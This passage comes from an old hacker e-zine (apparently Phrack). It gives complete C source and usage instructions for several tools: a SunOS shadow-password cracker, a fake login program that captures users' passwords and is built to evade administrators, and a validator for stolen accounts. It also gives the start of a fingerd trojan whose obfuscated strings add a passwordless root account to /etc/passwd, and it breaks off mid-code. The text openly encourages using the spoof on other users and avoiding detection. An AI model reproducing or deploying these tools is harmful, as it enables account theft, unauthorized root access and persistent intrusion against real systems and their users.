validate the i.d. and password. If such a function does exist on other
shadowed systems then this program could be very easily modified to work
without problems.
The only real beef I have about this program is that because the
pwdauth() function uses the standard unix crypt() function to encrypt the
supplied password, it is very slow!!! Even in burst mode, a password file
with 1000's of users could take a while to get through. My advice is
to run it in the background and direct all its screen output to /dev/null
like so :-
shcrack -mf -uroot -ddict1 > /dev/null &
Then you can log out then come back and check on it later!
The program works in a number of modes, all of which I will describe below,
is command line driven, and can be used to crack both multiple accounts in
the password file and single accounts specified. It is also NIS/NFS (Sun
Yellow Pages) compatible.
How to use it
-------------
shcrack -m[mode] -p[password file] -u[user id] -d[dictionary file]
Usage :-
-m[mode] there are 3 modes of operation :-
-mb Burst mode, this scans the password file, trying the minimum number
of password guessing strategies on every account.
-mi Mini-burst mode, this also scans the password file, and tries most
password guessing strategies on every account.
-mf Brute-force mode, tries all password strategies, including the use
of words from a dictionary, on a single account specified.
more about these modes in a sec, the other options are :-
-p[password file] This is the password file you wish to use, if this is
left unspecified, the default is /etc/passwd.
NB: The program automatically detects and uses the
password file wherever it may be in NIS/NFS systems.
-u[user id] The login i.d. of the account you wish to crack, this is used
in Brute-force single user mode.
-d[dict file] This uses the words in a dictionary file to generate
possible passwords for use in single user brute force
mode. If no filename is specified, the program only uses the
password guessing strategies without using the dictionary.
Modes
^^^^^
-mb Burst mode basically gets each account from the appropriate password
file and uses two methods to guess its password. Firstly, it uses the
account name as a password, this name is then reversed and tried as a
possible password. This may seem like a weak strategy, but remember,
the users passwords are already shadowed, and therefore are deemed to
be secure. This can lead to sloppy passwords being used, and I have
came across many cases where the user has used his/her i.d. as a
password.
-mi Mini-burst mode uses a number of other password generating methods
as well as the 2 listed in burst mode. One of the methods involves
taking the login i.d. of the account being cracked, and appending the
numbers 0 to 9 to the end of it to generate possible passwords. If
this mode has no luck, it then uses the accounts gecos 'comment'
information from the password file, splitting it into words and
trying these as passwords. Each word from the comment field is also
reversed and tried as a possible password.
-mf Brute-force single user mode uses all the above techniques for password
guessing as well as using a dictionary file to provide possible
passwords to crack a single account specified. If no dictionary filename
is given, this mode operates on the single account using the
same methods as mini-burst mode, without the dictionary.
Using shadow crack
------------------
To get program help from the command line just type :-
$ shcrack <RETURN>
which will show you all the modes of operation.
If you wanted to crack just the account 'root', located in
/etc/passwd(or elsewhere on NFS/NIS systems), using all methods
including a dictionary file called 'dict1', you would do :-
$ shcrack -mf -uroot -ddict1
to do the above without using the dictionary file, do :-
$ shcrack -mf -uroot
or to do the above but in password file 'miner' do :-
$ shcrack -mf -pminer -uroot
to start cracking all accounts in /etc/passwd, using minimum password
strategies do :-
$ shcrack -mb
to do the above but on a password file called 'miner' in your home
directory do :-
$ shcrack -mb -pminer
to start cracking all accounts in 'miner', using all strategies except
dictionary words do :-
$ shcrack -mi -pminer
ok, heres the code, ANSI C Compilers only :-
---cut here-------------------------------------------------------------------
/* Program : Shadow Crack
Author : (c)1994 The Shining/UPi (UK Division)
Date : Released 12/4/94
Unix type : SUNOS Shadowed systems only */
#include <stdio.h>
#include <pwd.h>
#include <string.h>
#include <ctype.h>
#include <signal.h>
#define WORDSIZE 20 /* Maximum word size */
#define OUTFILE "data" /* File to store cracked account info */
void word_strat( void ), do_dict( void );
void add_nums( char * ), do_comment( char * );
void try_word( char * ), reverse_word( char * );
void find_mode( void ), burst_mode( void );
void mini_burst( void ), brute_force( void );
void user_info( void ), write_details( char * );
void pwfile_name( void ), disable_interrupts( void ), cleanup();
char *logname, *comment, *homedir, *shell, *dict, *mode,
*pwfile, *pwdauth();
struct passwd *getpwnam(), *pwentry;
extern char *optarg;
int option, uid, gid;
int main( int argc, char **argv )
{
disable_interrupts();
system("clear");
if (argc < 2) {
printf("Shadow Crack - (c)1994 The Shining\n");
printf("SUNOS Shadow password brute force cracker\n\n");
printf("useage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]);
printf("-d[dictfile]\n\n\n");
printf("[b] is burst mode, scans pwfile trying minimum\n");
printf(" password strategies on all i.d's\n\n");
printf("[i] is mini-burst mode, scans pwfile trying both\n");
printf(" userid, gecos info, and numbers to all i.d's\n\n");
printf("[f] is bruteforce mode, tries all above stategies\n");
printf(" as well as dictionary words\n\n");
printf("[pwfile] Uses the password file [pwfile], default\n");
printf(" is /etc/passwd\n\n");
printf("[loginid] Account you wish to crack, used with\n");
printf(" -mf bruteforce mode only\n\n");
printf("[dictfile] uses dictionary file [dictfile] to\n");
printf(" generate passwords when used with\n");
printf(" -mf bruteforce mode only\n\n");
exit(0);
}
/* Get options from the command line and store them in different
variables */
while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF)
switch(option)
{
case 'm':
mode = optarg;
break;
case 'p':
pwfile = optarg;
break;
case 'u':
logname = optarg;
break;
case 'd':
dict = optarg;
break;
default:
printf("wrong options\n");
break;
}
find_mode();
}
/* Routine to redirect interrupts */
void disable_interrupts( void )
{
signal(SIGHUP, SIG_IGN);
signal(SIGTSTP, cleanup);
signal(SIGINT, cleanup);
signal(SIGQUIT, cleanup);
signal(SIGTERM, cleanup);
}
/* If CTRL-Z or CTRL-C is pressed, clean up & quit */
void cleanup( void )
{
FILE *fp;
if ((fp = fopen("gecos", "r")) != NULL)
remove("gecos");
if ((fp = fopen("data", "r")) == NULL)
printf("\nNo accounts cracked\n");
printf("Quitting\n");
exit(0);
}
/* Function to decide which mode is being used and call appropriate
routine */
void find_mode( void )
{
if (strcmp(mode, "b") == NULL)
burst_mode();
else
if (strcmp(mode, "i") == NULL)
mini_burst();
else
if (strcmp(mode, "f") == NULL)
brute_force();
else
{
printf("Sorry - No such mode\n");
exit(0);
}
}
/* Get a users information from the password file */
void user_info( void )
{
uid = pwentry->pw_uid;
gid = pwentry->pw_gid;
comment = pwentry->pw_gecos;
homedir = pwentry->pw_dir;
shell = pwentry->pw_shell;
}
/* Set the filename of the password file to be used, default is
/etc/passwd */
void pwfile_name( void )
{
if (pwfile != NULL)
setpwfile(pwfile);
}
/* Burst mode, tries user i.d. & then reverses it as possible passwords
on every account found in the password file */
void burst_mode( void )
{
pwfile_name();
setpwent();
while ((pwentry = getpwent()) != (struct passwd *) NULL)
{
logname = pwentry->pw_name;
user_info();
try_word( logname );
reverse_word( logname );
}
endpwent();
}
/* Mini-burst mode, try above combinations as well as other strategies
which include adding numbers to the end of the user i.d. to generate
passwords or using the comment field information in the password
file */
void mini_burst( void )
{
pwfile_name();
setpwent();
while ((pwentry = getpwent()) != (struct passwd *) NULL)
{
logname = pwentry->pw_name;
user_info();
word_strat();
}
endpwent();
}
/* Brute force mode, uses all the above strategies as well using a
dictionary file to generate possible passwords */
void brute_force( void )
{
pwfile_name();
setpwent();
if ((pwentry = getpwnam(logname)) == (struct passwd *) NULL) {
printf("Sorry - User unknown\n");
exit(0);
}
else
{
user_info();
word_strat();
do_dict();
}
endpwent();
}
/* Calls the various password guessing strategies */
void word_strat()
{
try_word( logname );
reverse_word( logname );
add_nums( logname );
do_comment( comment );
}
/* Takes the user name as its argument and then generates possible
passwords by adding the numbers 0-9 to the end. If the username
is greater than 7 characters, don't bother */
void add_nums( char *wd )
{
int i;
char temp[2], buff[WORDSIZE];
if (strlen(wd) < 8) {
for (i = 0; i < 10; i++)
{
strcpy(buff, wd);
sprintf(temp, "%d", i);
strcat(wd, temp);
try_word( wd );
strcpy(wd, buff);
}
}
}
/* Gets info from the 'gecos' comment field in the password file,
then process this information generating possible passwords from it */
void do_comment( char *wd )
{
FILE *fp;
char temp[2], buff[WORDSIZE];
int c, flag;
flag = 0;
/* Open file & store users gecos information in it. w+ mode
allows us to write to it & then read from it. */
if ((fp = fopen("gecos", "w+")) == NULL) {
printf("Error writing gecos info\n");
exit(0);
}
fprintf(fp, "%s\n", wd);
rewind(fp);
strcpy(buff, "");
/* Process users gecos information, separate words by checking for the
',' field separater or a space. */
while ((c = fgetc(fp)) != EOF)
{
if (( c != ',' ) && ( c != ' ' )) {
sprintf(temp, "%c", c);
strncat(buff, temp, 1);
}
else
flag = 1;
if ((isspace(c)) || (c == ',') != NULL) {
if (flag == 1) {
c=fgetc(fp);
if ((isspace(c)) || (iscntrl(c) == NULL))
ungetc(c, fp);
}
try_word(buff);
reverse_word(buff);
strcpy(buff, "");
flag = 0;
strcpy(temp, "");
}
}
fclose(fp);
remove("gecos");
}
/* Takes a string of characters as its argument(in this case the login
i.d., and then reverses it */
void reverse_word( char *wd )
{
char temp[2], buff[WORDSIZE];
int i;
i = strlen(wd) + 1;
strcpy(temp, "");
strcpy(buff, "");
do
{
i--;
if ((isalnum(wd[i]) || (ispunct(wd[i]))) != NULL) {
sprintf(temp, "%c", wd[i]);
strncat(buff, temp, 1);
}
} while(i != 0);
if (strlen(buff) > 1)
try_word(buff);
}
/* Read one word at a time from the specified dictionary for use
as possible passwords, if dictionary filename is NULL, ignore
this operation */
void do_dict( void )
{
FILE *fp;
char buff[WORDSIZE], temp[2];
int c;
strcpy(buff, "");
strcpy(temp, "");
if (dict == NULL)
exit(0);
if ((fp = fopen(dict, "r")) == NULL) {
printf("Error opening dictionary file\n");
exit(0);
}
rewind(fp);
while ((c = fgetc(fp)) != EOF)
{
if ((c != ' ') || (c != '\n')) {
strcpy(temp, "");
sprintf(temp, "%c", c);
strncat(buff, temp, 1);
}
if (c == '\n') {
if (buff[0] != ' ')
try_word(buff);
strcpy(buff, "");
}
}
fclose(fp);
}
/* Process the word to be used as a password by stripping \n from
it if necessary, then use the pwdauth() function, with the login
name and word to attempt to get a valid id & password */
void try_word( char pw[] )
{
int pwstat, i, pwlength;
char temp[2], buff[WORDSIZE];
strcpy(buff, "");
pwlength = strlen(pw);
for (i = 0; i != pwlength; i++)
{
if (pw[i] != '\n') {
strcpy(temp, "");
sprintf(temp, "%c", pw[i]);
strncat(buff, temp, 1);
}
}
if (strlen(buff) > 3 ) {
printf("Trying : %s\n", buff);
if (pwstat = pwdauth(logname, buff) == NULL) {
printf("Valid Password! - writing details to 'data'\n");
write_details(buff);
if (strcmp(mode, "f") == NULL)
exit(0);
}
}
}
/* If valid account & password, store this, along with the accounts
uid, gid, comment, homedir & shell in a file called 'data' */
void write_details( char *pw )
{
FILE *fp;
if ((fp = fopen(OUTFILE, "a")) == NULL) {
printf("Error opening output file\n");
exit(0);
}
fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid);
fprintf(fp, "%s:%s:%s\n", comment, homedir, shell);
fclose(fp);
}
---cut here-------------------------------------------------------------------
again to compile it do :-
$ gcc shcrack.c -o shcrack
or
$ acc shcrack.c -o shcrack
this can vary depending on your compiler.
The Ultimate Login Spoof
^^^^^^^^^^^^^^^^^^^^^^^^
Well this subject has been covered many times before but its a while since
I have seen a good one, and anyway I thought other unix spoofs have had two
main problems :-
1) They were pretty easy to detect when running
2) They recorded any only shit entered.....
Well now I feel these problems have been solved with the spoof below.
Firstly, I want to say that no matter how many times spoofing is deemed as
a 'lame' activity, I think it is very underestimated.
When writing this I have considered every possible feature such a program
should have. The main ones are :-
1) To validate the entered login i.d. by searching for it in the
password file.
2) Once validated, to get all information about the account entered
including - real name etc from the comment field, homedir info
(e.g. /homedir/miner) and the shell the account is using and
store all this in a file.
3) To keep the spoofs tty idle time to 0, thus not to arouse the
administrators suspicions.
4) To validates passwords before storing them, on all unshadowed unix systems
& SUNOS shadowed/unshadowed systems.
5) To emulates the 'sync' dummy account, thus making it act like the
real login program.
6) Disable all interrupts(CTRL-Z, CTRL-D, CTRL-C), and automatically
quit if it has not grabbed an account within a specified time.
7) To automatically detect & display the hostname before the login prompt
e.g. 'ccu login:', this feature can be disabled if desired.
8) To run continuously until a valid i.d. & valid password are entered.
As well as the above features, I also added a few more to make the spoof
'foolproof'. At university, a lot of the users have been 'stung' by
login spoofs in the past, and so have become very conscious about security.
For example, they now try and get around spoofs by entering any old crap when
prompted for their login name, or to hit return a few times, to prevent any
'crappy' spoofs which may be running. This is where my spoof shines!,
firstly if someone was to enter -
login: dhfhfhfhryr
Password:
into the spoof, it checks to see if the login i.d. entered is
valid by searching for it in the password file. If it exists, the
spoof then tries to validate the password. If both the i.d. & password
are valid, these will be stored in a file called .data, along with
additional information about the account taken directly from the password
file.
Now if, as in the case above, either the login name or password is
incorrect, the information is discarded, and the login spoof runs again,
waiting for a valid user i.d. & password to be entered.
Also, a lot of systems these days have an unpassworded account called
'sync', which when logged onto, usually displays the date & time the
sync account was last logged into, and from which server or tty,
the message of the day, syncs the disk, and then logs you straight out.
A few people have decided that the best way to dodge login spoofs is to
first login to this account then when they are automatically logged out,
to login to their own account.
They do this firstly, so that if a spoof is running it only records the
details of the sync account and secondly the spoof would not act as the
normal unix login program would, and therefore they would spot it and report
it, thus landing you in the shit with the system administrator.
However, I got around this problem so that when someone
tries to login as sync (or another account of a similar type, which you can
define), it acts exactly like the normal login program would, right down to
displaying the system date & time as well as the message of the day!!
The idle time facility
----------------------
One of the main problems with unix spoofs, is they can be spotted
so easily by the administrator, as he/she could get a list of current
users on the system and see that an account was logged on, and had been
idle for maybe 30 minutes. They would then investigate & the spoof
would be discovered.
I have therefore incorporated a scheme in the spoof whereby
approx. every minute, the tty the spoof is executed from, is 'touched'
with the current time, this effectively simulates terminal activity &
keeps the terminals idle time to zero, which helps the spoofs chances
of not being discovered greatly.
The spoof also incorporates a routine which will automatically
keep track of approximately how long the spoof has been running, and if
it has been running for a specified time without grabbing an i.d. or password,
will automatically exit and run the real login program.
This timer is by default set to 12.5 minutes, but you can alter this time
if you wish.
Note: Due to the varying processing power of some systems, I could not
set the timer to exactly 60 seconds, I have therefore set it to 50,
incase it loses or gains extra time. Take this into consideration when
setting the spoofs timer to your own value. I recommend you
stick with the default, and under no circumstances let it run
for hours.
Password Validation techniques
------------------------------
The spoof basically uses 2 methods of password validation(or none at
all on a shadowed system V). Firstly, when the spoof is used on any unix
with an unshadowed password file, it uses the crypt function to validate a
password entered. If however the system is running SUNOS 4.1.+ and
incorporates the shadow password system, the program uses a function called
pwdauth(). This takes the login i.d. & decrypted password as its arguments
and checks to see if both are valid by encrypting the password and
comparing it to the shadowed password file which is usually located in
/etc/security and accessible only by root. By validating both the i.d. &
password we ensure that the data which is saved to file is correct and not
any old bullshit typed at the terminal!!!
Executing the Spoof
-------------------
ok, now about the program. This is written in ANSI-C, so I hope you have a
compatible compiler, GCC or suns ACC should do it. Now the only time you
will need to change to the code is in the following circumstances :-
1) If you are to compile & run it on an unshadowed unix,
in which case remove all references to the pwdauth() function,
from both the declarations & the shadow checking routine, add
this code in place of the shadow password checking routine :-
if ( shadow == 1 ) {
invalid = 0;
else
invalid = 1;
}
2) Add the above code also to the spoof if you are running this on a system
V which is shadowed. In this case the spoof loses its ability to
validate the password, to my knowledge there is no sysV equivalent
of the pwdauth() function.
Everything else should be pretty much compatible. You should have no
problems compiling & running this on an unshadowed SUNOS machine, if
you do, make the necessary changes as above, but it compiled ok
on every unshadowed SUNOS I tested it on. The Spoof should
automatically detect whether a SUNOS system is shadowed or unshadowed
and run the appropriate code to deal with each situation.
Note: when you have compiled this spoof, you MUST 'exec' it from the
current shell for it to work, you must also only have one shell
running. e.g. from C or Bourne shell using the GNU C Compiler do :-
$ gcc spoof.c -o spoof
$ exec spoof
This replaces the current shell with the spoof, so when the spoof quits &
runs the real login program, the hackers account is effectively logged off.
ok enough of the bullshit, here's the spoof :-
----------cut here-------------------------------------------------------
/* Program : Unix login spoof
Author : The Shining/UPi (UK Division)
Date : Released 12/4/94
Unix Type : All unshadowed unix systems &
shadowed SUNOS systems
Note : This file MUST be exec'd from the shell. */
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <pwd.h>
#include <time.h>
#include <utime.h>
#define OUTFILE ".data" /* Data file to save account info into */
#define LOGPATH "/usr/bin/login" /* Path of real login program */
#define DUMMYID "sync" /* Dummy account on your system */
#define DLENGTH 4 /* Length of dummy account name */
FILE *fp;
/* Set up variables to store system time & date */
time_t now;
static int time_out, time_on, no_message, loop_cnt;
/* Set up a structure to store users information */
struct loginfo {
char logname[10];
char key[9];
char *comment;
char *homedir;
char *shell;
} u;
/* Use the unix function getpass() to read user password and
crypt() or pwdauth() (remove it below if not SUNOS)
to validate it etc */
char *getpass(), *gethostname(), *alarm(), *sleep(),
*crypt(), *ttyname(), *pwdauth(), motd, log_date[60],
pass[14], salt[3], *tty, cons[] = " on console ",
hname[72], *ld;
/* flag = exit status, ppid = pid shell, wait = pause length,
pwstat = holds 0 if valid password, shadow holds 1 if shadow
password system is being used, 0 otherwise. */
int flag, ppid, wait, pwstat, shadow, invalid;
/* Declare main functions */
void write_details(struct loginfo *);
void catch( void ), disable_interrupts( void );
void log_out( void ), get_info( void ),
invalid_login( void ), prep_str( char * );
/* set up pointer to point to pwfile structure, and also
a pointer to the utime() structure */
struct passwd *pwentry, *getpwnam();
struct utimbuf *times;
int main( void )
{
system("clear");
/* Initialise main program variables to 0, change 'loop_cnt' to 1
if you do not want the machines host name to appear with
the login prompt! (e.g. prompt is `login:` instead of
'MIT login:' etc) */
wait = 3; /* Holds value for pause */
flag = 0; /* Spoof ends if value is 1 */
loop_cnt = 0; /* Change this to 1 if no host required */
time_out = 0; /* Stops timer if spoof has been used */
time_on = 0; /* Holds minutes spoof has been running */
disable_interrupts(); /* Call function to disable Interrupts */
/* Get system time & date and store in log_date, this is
displayed when someone logs in as 'sync' */
now = time(NULL);
strftime(log_date, 60, "Last Login: %a %h %d %H:%M:%S", localtime(&now));
strcat(log_date, cons);
ld = log_date;
/* Get Hostname and tty name */
gethostname(hname, 64);
strcat(hname, " login: ");
tty = ttyname();
/* main routine */
while( flag == 0 )
{
invalid = 0; /* Holds 1 if id +/or pw are invalid */
shadow = 0; /* 1 if shadow scheme is in operation */
no_message = 0; /* Flag for Login Incorrect msg */
alarm(50); /* set timer going */
get_info(); /* get user i.d. & password */
/* Check to see if the user i.d. entered is 'sync', if it is
display system time & date, display message of the day and
then run the spoof again, insert the account of your
choice here, if its not sync, but remember to put
the length of the accounts name next to it! */
if (strncmp(u.logname, DUMMYID, DLENGTH) == NULL) {
printf("%s\n", ld);
if ((fp = fopen("/etc/motd", "r")) != NULL) {
while ((motd = getc(fp)) != EOF)
putchar(motd);
fclose(fp);
}
printf("\n");
prep_str(u.logname);
no_message = 1;
sleep(wait);
}
/* Check if a valid user i.d. has been input, then check to see if
the password system is shadowed or unshadowed.
If both the user i.d. & password are valid, get additional info
from the password file, and store all info in a file called .data,
then exit spoof and run real login program */
setpwent(); /* Rewind pwfile to beign processing */
if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) {
invalid = 1;
flag = 0;
}
else
strncpy(salt, pwentry->pw_passwd, 2);
/* Check for shadowed password system, in SUNOS, the field in /etc/passwd
should begin with '##', in system V it could contain an 'x', if none
of these exist, it checks that the entry = 13 chars, if less then
shadow system will probably be implemented (unless acct has been
disabled) */
if ( invalid == 0 ) {
if ((strcmp(salt, "##")) || (strncmp(salt, "x", 1)) == NULL)
shadow = 1;
else
if (strlen(pwentry->pw_passwd) < 13)
shadow = 1;
/* If unshadowed, use the salt from the pwfile field & the key to
form the encrypted password which is checked against the entry
in the password file, if it matches, then all is well, if not,
spoof runs again!! */
if ( shadow != 1 ) {
if (strcmp(pwentry->pw_passwd, crypt(u.key, salt)) == NULL)
invalid = 0;
else
invalid = 1;
}
/* If SUNOS Shadowing is in operation, use the pwdauth() function
to validate the password, if not SUNOS, substitute this code
with the routine I gave earlier! */
if ( shadow == 1 ) {
if (pwstat = pwdauth(u.logname, u.key) == NULL)
invalid = 0;
else
invalid = 1;
}
}
/* If we have a valid account & password, get user info from the
pwfile & store it */
if ( invalid == 0 ) {
u.comment = pwentry->pw_gecos;
u.homedir = pwentry->pw_dir;
u.shell = pwentry->pw_shell;
/* Open file to store user info */
if ((fp = fopen(OUTFILE, "a")) == NULL)
log_out();
write_details(&u);
fclose(fp);
no_message = 1;
flag = 1;
}
else
flag = 0;
invalid_login();
endpwent(); /* Close pwfile */
if (no_message == 0)
loop_cnt++;
} /* end while */
log_out(); /* call real login program */
}
/* Function to read user i.d. & password */
void get_info( void )
{
char user[11];
unsigned int string_len;
fflush(stdin);
prep_str(u.logname);
prep_str(u.key);
strcpy(user, "\n");
/* Loop while some loser keeps hitting return when asked for user
i.d. and if someone hits CTRL-D to break out of spoof. Enter
a # at login to exit spoof. Uncomment the appropriate line(s)
below to customise the spoof to look like your system */
while ((strcmp(user, "\n") == NULL) && (!feof(stdin)))
{
/* printf("Scorch Ltd SUNOS 4.1.3\n\n); */
if (loop_cnt > 0)
strcpy(hname, "login: ");
printf("%s", hname);
fgets(user, 9, stdin);
/* Back door for hacker, # at present, can be changed,
but leave \n in. */
if (strcmp(user, "#\n") == NULL)
exit(0);
/* Strip \n from login i.d. */
if (strlen(user) < 8)
string_len = strlen(user) - 1;
else
string_len = strlen(user);
strncpy(u.logname, user, string_len);
/* check to see if CTRL-D has occurred because it does not
generate an interrupt like CTRL-C, but instead generates
an end-of-file on stdin */
if (feof(stdin)) {
clearerr(stdin);
printf("\n");
}
}
/* Turn off screen display & read users password */
strncpy(u.key, getpass("Password:"), 8);
}
/* Function to increment the timer which holds the amount of time
the spoof has been running */
void catch( void )
{
time_on++;
/* If spoof has been running for 15 minutes, and has not
been used, stop timer and call spoof exit routine */
if ( time_out == 0 ) {
if (time_on == 15) {
printf("\n");
alarm(0);
log_out();
}
}
/* 'Touch' your tty, effectively keeping terminal idle time to 0 */
utime(tty, times);
alarm(50);
}
/* Initialise a string with \0's */
void prep_str( char str[] )
{
int strl, cnt;
strl = strlen(str);
for (cnt = 0; cnt != strl; cnt++)
str[cnt] = ' ';
}
/* function to catch interrupts, CTRL-C & CTRL-Z etc as
well as the timer signals */
void disable_interrupts( void )
{
signal(SIGALRM, catch);
signal(SIGQUIT, SIG_IGN);
signal(SIGTERM, SIG_IGN);
signal(SIGINT, SIG_IGN);
signal(SIGTSTP, SIG_IGN);
}
/* Write the users i.d., password, personal information, homedir
and shell to a file */
void write_details(struct loginfo *sptr)
{
fprintf(fp, "%s:%s:", sptr->logname, sptr->key);
fprintf(fp, "%d:%d:", pwentry->pw_uid, pwentry->pw_gid);
fprintf(fp, "%s:%s:", sptr->comment, sptr->homedir);
fprintf(fp, "%s\n", sptr->shell);
fprintf(fp, "\n");
}
/* Display login incorrect only if the user hasn't logged on as
'sync' */
void invalid_login( void )
{
if ( flag == 1 && pwstat == 0 )
sleep(wait);
if ( no_message == 0 )
printf("Login incorrect\n");
}
/* Displays appropriate message, exec's the real login program,
this replaces the spoof & effectively logs spoof's account off.
Note: this spoof must be exec'd from the shell to work */
void log_out( void )
{
time_out = 1;
if ( no_message == 1 ) {
sleep(1);
printf("Login incorrect\n");
}
execl(LOGPATH, "login", (char *)0);
}
----------cut here-------------------------------------------------------
then delete the source, run it and wait for some sucker to login!.
If you do initially run this spoof from your account, I suggest you
remove it when you have grabbed someone's account and run it from theirs
from then on, this reduces your chances of being caught!
User i.d. & Password Validator
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Now if you are familiar with the unix Crack program, as I'm sure most of
you are ;-), or if you have used my spoof to grab some accounts,
this little program could be of some use. Say you have snagged
quit a few accounts, and a few weeks later you wanna see if they are still
alive, instead of logging onto them, then logging out again 20 or 30 times
which can take time, and could get the system admin looking your way, this
program will continuously ask you to enter a user i.d. & password, then
validate them both by actually using the appropriate entry in the password
file. All valid accounts are then stored along with other info from the
password file, in a data file. The program loops around until you stop it.
This works on all unshadowed unix systems, and, you guessed it!, shadowed
SUNOS systems.
If you run it on an unshadowed unix other than SUNOS, remove all references
to pwdauth(), along with the shadow password file checking routine,
if your on sysV, your shit outa luck! anyway, here goes :-
---cut here---------------------------------------------------------------
/* Program : To validate accounts & passwords on both
shadowed & unshadowed unix systems.
Author : The Shining/UPi (UK Division)
Date : Released 12/4/94
UNIX type : All unshadowed systems, and SUNOS shadowed systems */
#include <stdio.h>
#include <string.h>
#include <pwd.h>
FILE *fp;
int pw_system( void ), shadowed( void ), unshadowed( void );
void write_info( void ), display_notice( void );
struct passwd *pwentry, *getpwnam();
struct user {
char logname[10];
char key[9];
char salt[3];
} u;
char *getpass(), *pwdauth(), *crypt(), ans[2];
int invalid_user, stat;
int main( void )
{
strcpy(ans, "y");
while (strcmp(ans, "y") == NULL)
{
invalid_user = stat = 0;
display_notice();
printf("Enter login id:");
scanf("%9s", u.logname);
strcpy(u.key, getpass("Password:"));
setpwent();
if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL)
invalid_user = 1;
else
strncpy(u.salt, pwentry->pw_passwd, 2);
if (invalid_user != 1) {
if ((stat = pw_system()) == 1) {
if ((stat = unshadowed()) == NULL) {
printf("Unshadowed valid account! - storing details\n");
write_info();
}
}
else
if ((stat = shadowed()) == NULL) {
printf("SUNOS Shadowed valid account! - storing details\n");
write_info();
}
else
invalid_user = 2;
}
if (invalid_user == 1)
printf("User unknown/not found in password file\n");
if (invalid_user == 2 )
printf("Password invalid\n");
printf("\n\nValidate another account?(y/n): ");
scanf("%1s", ans);
endpwent();
}
}
/* Check to see if shadow password system is used, in SUNOS the field
in /etc/passwd starts with a '#', if not, check to see if entry
is 13 chars, if not shadow must be in use. */
int pw_system( void )
{
if (strlen(pwentry->pw_passwd) != 13)
return(0);
else
if (strcmp(u.salt, "##") == NULL)
return(0);
else
return(1);
}
/* If system is unshadowed, get the 2 character salt from the password
file, and use this to encrypt the password entered. This is then
compared against the password file entry. */
int unshadowed( void )
{
if (pwentry->pw_passwd == crypt(u.key, u.salt))
return(0);
else
return(1);
}
/* If SUNOS shadowe system is used, use the pwdauth() function to validate
the password stored in the /etc/security/passwd.adjunct file */
int shadowed( void )
{
int pwstat;
if (pwstat = pwdauth(u.logname, u.key) == NULL)
return(0);
else
return(1);
}
/* Praise myself!!!! */
void display_notice( void )
{
system("clear");
printf("Unix Account login id & password validator.\n");
printf("For all unshadowed UNIX systems & shadowed SUNOS only.\n\n");
printf("(c)1994 The Shining\n\n\n\n");
}
/* Open a file called 'data' and store account i.d. & password along with
other information retrieved from the password file */
void write_info( void )
{
/* Open a file & store account information from pwfile in it */
if ((fp = fopen("data", "a")) == NULL) {
printf("error opening output file\n");
exit(0);
}
fprintf(fp, "%s:%s:%d:", u.logname, u.key, pwentry->pw_uid);
fprintf(fp, "%d:%s:", pwentry->pw_gid, pwentry->pw_gecos);
fprintf(fp, "%s:%s\n", pwentry->pw_dir, pwentry->pw_shell);
fclose(fp);
}
-----cut here------------------------------------------------------------------
The above programs will not compile under non-ansi C compilers without quite
a bit of modification. I have tested all these programs on SUNOS both
shadowed & unshadowed, though they should work on other systems with
little modification (except the shadow password cracker, which is SUNOS
shadow system specific).
Regards to the following guys :-
Archbishop & The Lost Avenger/UPi, RamRaider/QTX,
the guys at United International Perverts(yo Dirty Mac & Jasper!)
and all I know.
(c) 1994 The Shining (The NORTH!, U.K.)
*******************************************************************************
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 12 of 28
****************************************************************************
The fingerd trojan horse
Original article by Hitman Italy for Phrack Inc.
This article is for informational purpose only, I'm not liable for
any damage or illegal activity perpetrated using the source or the
informations in the article.
-=- + -
So you have gained access to a system and want to keep on hacking without
being kicked off by a smart operator, there are dozen methods you can use,
usually, if an operator figure out that his system is under attack, he'll
check out the login program and telnetd for backdoors, then the telnet for
logging activities or network sniffers and so on.. if nothing is found
he'll realize the hacker is a dumb ass and he'll just modify the passwd to
prevent him from logging on (in most cases), here comes my fingerd trojan.
This scheme is quite original (I've never seen it used) and the source is
compact enough to be fitted into a MAG. The fingerd as all you know (I
hope) is the finger server run by inetd when a client opens the finger
port (N.79), of course if the port is locked, or you have a network
firewall, do not use this code.
---------- + CUT HERE + -----------------------------------------------
/* The Fingerd trojan by Hitman Italy
* This source cannot be spread without the whole article
* but you can freely implement or modify it for personal use
*/
static char copyright[] = ""; /* Add the copyright string here */
static char sccsid[] = ""; /* Add the sccsid string here */
#include <stdio.h>
#define PATH_FINGER "/usr/ucb/finger"
#define CODE 161
char *HitCrypt(ch)
char *ch;
{
char *b;
b=ch;
while ((*(ch++)^=CODE)!=0x00);
return(b);
}
main(argc,argv)
int argc;
char *argv[];
{
register FILE *fp;
register int ch;
register char *lp;
int p[2];
static char exor[4][23]={
{201,200,213,CODE},
{142,196,213,194,142,209,192,210,210,214,197,CODE},
{201,200,213,155,155,145,155,145,155,155,142,155,142,195,200,207,142,194,
210,201,CODE},
{227,192,194,202,197,206,206,211,129,192,194,213,200,215,192,213,196,197,
143,143,143,CODE} };
#define ENTRIES 50
char **ap, *av[ENTRIES + 1], line[1024], *strtok();
#ifdef LOGGING /* unused, leave it for "strings" command */
#include <netinet/in.h>
struct sockaddr_in sin;
int sval;
sval = sizeof(sin);
if (getpeername(0, &sin, &sval) < 0)
fatal(argv[0],"getpeername");
#endif
if (!fgets(line, sizeof(line), stdin))
exit(1);
av[0] = "finger";
for (lp = line, ap = &av[1];;) {
*ap = strtok(lp, " \t\r\n");
if (!*ap)
break;
if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
*ap = "-l";
if (++ap == av + ENTRIES)
break;
lp = NULL;
}
if (pipe(p) < 0)
fatal(argv[0],"pipe");
switch(fork()) {
case 0:
(void)close(p[0]);
if (p[1] != 1) {
(void)dup2(p[1], 1);
(void)close(p[1]);
}
/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
if (av[1])
if (strcmp( (HitCrypt(&exor[0][0])) ,av[1])==0) {
if(!(fp=fopen( (HitCrypt(&exor[1][0])) ,"a")))
_exit(10);
fprintf(fp,"%s\n", HitCrypt(&exor[2][0]));
printf("%s\n", HitCrypt(&exor[3][0]));
fclose(fp);
break;
}
